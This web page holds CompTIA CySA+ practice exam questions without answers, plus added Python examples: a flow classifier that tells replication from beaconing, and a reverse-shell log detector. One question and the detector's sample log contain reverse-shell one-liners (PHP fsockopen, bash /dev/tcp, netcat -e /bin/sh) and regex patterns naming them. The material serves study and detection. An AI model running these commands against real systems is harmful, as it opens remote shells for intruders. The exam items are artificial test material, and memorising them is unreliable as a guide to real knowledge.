Pass CompTIA CySA+ CS0-003 in Just 3 Days – Stress-Free, No Study Needed!
Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
- A. Hacktivist threat
- B. Advanced persistent threat
- C. Unintentional insider threat
- D. Nation-state threat
A security analyst has received an incident case regarding malware spreading out of control on a customer’s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?
- A. Cross-reference the signature with open-source threat intelligence.
- B. Configure the EDR to perform a full scan.
- C. Transfer the malware to a sandbox environment.
- D. Log in to the affected systems and run netstat.
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
- A. A local red team member is scanning the local RFC1918 segment to enumerate hosts
- B. A threat actor has a foothold on the network and is sending out control beacons
- C. An administrator executed a new database replication process without notifying the SOC
- D. An insider threat actor is running Responder on the local segment, creating traffic replication
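The telemetry behind this question is a set of flow records, and what separates a replication job from a beacon is volume and regularity rather than the port alone. The following is an added example, not code from the page: it groups NetFlow-style records on TCP/1433 by endpoint pair and labels a pair as a sustained bulk transfer (large, long-lived), as beaconing (many small flows at a regular interval) or as unremarkable. The thresholds and the flow records are constructed assumptions for illustration.

```python
"""Bulk transfer vs. beaconing on TCP/1433 from NetFlow-like records (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Flow:
    start: float     # seconds since epoch
    src: str
    dst: str
    dport: int
    bytes: int
    duration: float  # seconds


# Thresholds are assumptions for illustration; tune them to the environment.
BULK_BYTES = 50_000_000      # sustained transfer: at least 50 MB ...
BULK_SECONDS = 600           # ... over a conversation lasting at least 10 minutes
BEACON_MIN_FLOWS = 5         # need several check-ins to judge regularity
BEACON_MAX_BYTES = 10_000    # a beacon carries little data per flow
BEACON_MAX_JITTER = 0.2      # stdev/mean of the gaps between flow starts


def classify(flows):
    """Classify one (src, dst, dport) conversation from its sorted flows."""
    flows = sorted(flows, key=lambda f: f.start)
    total = sum(f.bytes for f in flows)
    span = flows[-1].start + flows[-1].duration - flows[0].start
    if total >= BULK_BYTES and span >= BULK_SECONDS:
        return "bulk_transfer"      # e.g. database replication or a large export
    if len(flows) >= BEACON_MIN_FLOWS and max(f.bytes for f in flows) <= BEACON_MAX_BYTES:
        gaps = [b.start - a.start for a, b in zip(flows, flows[1:])]
        # Beacons fire on a timer: small payloads at a near-constant interval.
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= BEACON_MAX_JITTER:
            return "beaconing"
    return "unremarkable"


def analyze(flows, port=1433):
    """Group flows on the port of interest by endpoint pair and classify each pair."""
    pairs = defaultdict(list)
    for f in flows:
        if f.dport == port:
            pairs[(f.src, f.dst)].append(f)
    return {pair: classify(fs) for pair, fs in pairs.items()}


# Constructed sample data (not real captures): a cross-WAN replication job,
# a low-volume timer-driven beacon to an external host, and two ordinary queries.
T0 = 1_700_000_000.0
REPLICATION = [Flow(T0 + i * 300, "10.1.0.5", "10.2.0.9", 1433, 100_000_000, 290.0)
               for i in range(4)]
BEACON = [Flow(T0 + i * 60, "10.1.0.77", "203.0.113.40", 1433, 420, 0.5)
          for i in range(20)]
NOISE = [Flow(T0, "10.1.0.12", "10.1.0.20", 1433, 3_000, 1.0),
         Flow(T0 + 5, "10.1.0.12", "10.1.0.20", 1433, 2_000, 1.0)]
SAMPLE_FLOWS = REPLICATION + BEACON + NOISE

if __name__ == "__main__":
    for pair, verdict in analyze(SAMPLE_FLOWS).items():
        print(f"{pair[0]} -> {pair[1]}: {verdict}")
```

A "bulk_transfer" verdict between two internal sites is the change-management question the answer points at (was replication scheduled and announced to the SOC?); a "beaconing" verdict, especially to an external address, is the one that warrants an incident ticket.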
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
- A. Risk register
- B. Vulnerability assessment
- C. Penetration test
- D. Compliance report
Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- A. Log retention
- B. Log rotation
- C. Maximum log size
- D. Threshold value
While reviewing web server logs, a security analyst discovers the following suspicious line:
`php -r '$socket=fsockopen("10.0.0.1", 1234); passthru("/bin/sh -i <&3 >&3 2>&3");'`
Which of the following is being attempted?
- A. Remote file inclusion
- B. Command injection
- C. Server-side request forgery
- D. Reverse shell
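The tell in the logged command is the combination of a connect-back (`fsockopen` to an attacker-controlled address) with a shell wired to that socket (`passthru("/bin/sh -i <&3 >&3 2>&3")`); a socket call on its own is not a reverse shell. The following is an added example, not code from the page: it scans log lines for that pairing across the PHP, bash `/dev/tcp` and netcat `-e` variants, normalises the typographic quotes that copy/paste or log extraction often introduce, and pulls out the callback address for triage. The log lines are constructed samples; the first one is the page's own command as it appears with curly quotes.

```python
"""Reverse-shell detection over web/command log lines (added example)."""
import re

# Log extraction and copy/paste often turn ASCII quotes into typographic ones;
# normalise them so the regexes below see the command as the shell did.
_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

# Indicators that the process opens a connection back to a remote host.
CONNECT_BACK = [
    re.compile(r"fsockopen\s*\(", re.I),                         # PHP socket
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),      # bash built-in
    re.compile(r"\bn(?:c|cat)\b[^|;]*\s-e\s", re.I),              # netcat -e
]

# Indicators that a shell or command executor is attached to that connection.
EXEC_SHELL = [
    re.compile(r"\b(?:passthru|exec|shell_exec|system|popen|proc_open)\s*\(", re.I),
    re.compile(r"\b(?:ba|z|da)?sh\s+-i\b"),                       # interactive shell
    re.compile(r"<&\d\s*>&\d\s*2>&\d"),                           # stdin/out/err on the socket
    re.compile(r"\s-e\s+(?:/\S+/)?(?:ba)?sh\b"),                  # nc -e /bin/sh
]

# Where the callback goes, for the three variants above.
_CALLBACK = [
    re.compile(r"""fsockopen\s*\(\s*['"]?(\d{1,3}(?:\.\d{1,3}){3})['"]?\s*,\s*(\d{1,5})"""),
    re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})"),
    re.compile(r"\bn(?:c|cat)\b\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})"),
]


def normalize(line):
    return line.translate(_QUOTES)


def callback_target(line):
    """Return (ip, port) of the connect-back if it can be parsed, else None."""
    for pat in _CALLBACK:
        m = pat.search(line)
        if m:
            return m.group(1), int(m.group(2))
    return None


def is_reverse_shell(line):
    """Connect-back plus shell/executor on one line is the tell; either alone is not."""
    s = normalize(line)
    return any(p.search(s) for p in CONNECT_BACK) and any(p.search(s) for p in EXEC_SHELL)


def scan(lines):
    """Return one finding per flagged line, with line number and callback target."""
    findings = []
    for n, raw in enumerate(lines, 1):
        if is_reverse_shell(raw):
            findings.append({"line_no": n,
                             "callback": callback_target(normalize(raw)),
                             "text": raw.strip()})
    return findings


# Constructed sample log lines (not a real capture).
SAMPLE_LOG = [
    "php -r \u2019$socket=fsockopen(\u201c10.0.0.1\u201d, 1234); passthru (\u201c/bin/sh -i <&3 >&3 2>&3\u201d);\u2019",
    "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    "php -r 'var_dump(fsockopen(\"192.0.2.20\", 80));'",   # socket only: health check, not a shell
    "nc 192.0.2.30 4444 -e /bin/sh",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["line_no"], f["callback"], f["text"])
```

The callback address is the first pivot for the analyst: block it at the egress, search other telemetry for the same destination, and treat the web server that logged the command as compromised rather than merely probed.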
Which of the following should be updated after a lessons-learned review?
- A. Disaster recovery plan
- B. Business continuity plan
- C. Tabletop exercise
- D. Incident response plan
A software developer has been deploying web applications with common security risks, including insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?
- A. Perform static analyses using an integrated development environment
- B. Deploy compensating controls into the environment
- C. Implement server-side logging and automatic updates
- D. Conduct regular code reviews using OWASP best practices
An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst’s investigation?
- A. OpenVAS
- B. Angry IP Scanner
- C. Wireshark
- D. Maltego
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization’s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor’s actions?
- A. Delivery
- B. Reconnaissance
- C. Exploitation
- D. Weaponization